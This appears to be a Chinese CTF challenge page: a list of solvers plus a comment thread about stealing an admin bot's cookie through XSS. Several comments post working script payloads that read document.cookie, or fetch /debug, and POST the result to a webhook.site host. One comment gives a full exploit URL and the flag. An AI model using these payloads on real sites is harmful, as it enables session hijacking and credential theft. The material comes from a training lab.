评分(0)
暂无评分
解题动态
llawlietD 攻破了该题 3小时前
hky 攻破了该题 4天前
Vluae 攻破了该题 10天前
Wh1teSu 攻破了该题 10天前
sncxubcdhc 攻破了该题 11天前
SilentBot 攻破了该题 14天前
Dxmax 攻破了该题 14天前
gdrhdr 攻破了该题 15天前
pinus 攻破了该题 15天前
Yan123 攻破了该题 15天前
Jay. 攻破了该题 15天前
denglonghua 攻破了该题 17天前
jibabenba 攻破了该题 18天前
xiaodou 攻破了该题 18天前
879205607 攻破了该题 21天前
AITester 攻破了该题 22天前
guity 攻破了该题 22天前
dsdqh699 攻破了该题 22天前
YHS-Beyond 攻破了该题 23天前
评论
保护级废物0.o 3月前
举报
发现XSS漏洞 - /zombie?show= 参数未过滤,可注入JavaScript 发现SSRF - /visit 让admin bot访问指定URL(限hostname为49.232.142.230) 发现Debug端点 - /debug 返回请求头信息(含cookie) 构造XSS payload - 让admin bot访问含XSS的页面:
倦鸟叫了一整天 1年前
举报
看不到源码呀
18715082837 10月前
举报
怎么看源码
15756309355 2年前
举报
斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器
林蔓露 8月前
举报
@yearling 管理员cookie:Wow, we really liked too!
lianglllllll 11月前
举报
这个要自己搭吗?之前有道题也是没有
lunarbyside 1年前
举报
@yearling 会不会是因为网络是私网地址啊
yearling 2年前
举报
我也拿不到cookie,难绷
missa 2年前
举报
请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,
vincentshine 1年前
举报
任何一个带外网站都可以,推荐ceye
一只小羊 2年前
举报
<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>
lunarbyside 1年前
举报
接收到请求了,但是没搞懂cookie在哪里,然后干嘛呢也不知道,也没看到cookie
vincentshine 1年前
举报
感谢老哥的脚本,我用其他的windows.location.href的方式打不开
1512624649 2年前
举报
flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个
meilanzhuju 2年前
举报
有点晕乎
qingfeng1115 2年前
举报
<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a
yituoshi 2年前
举报
Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08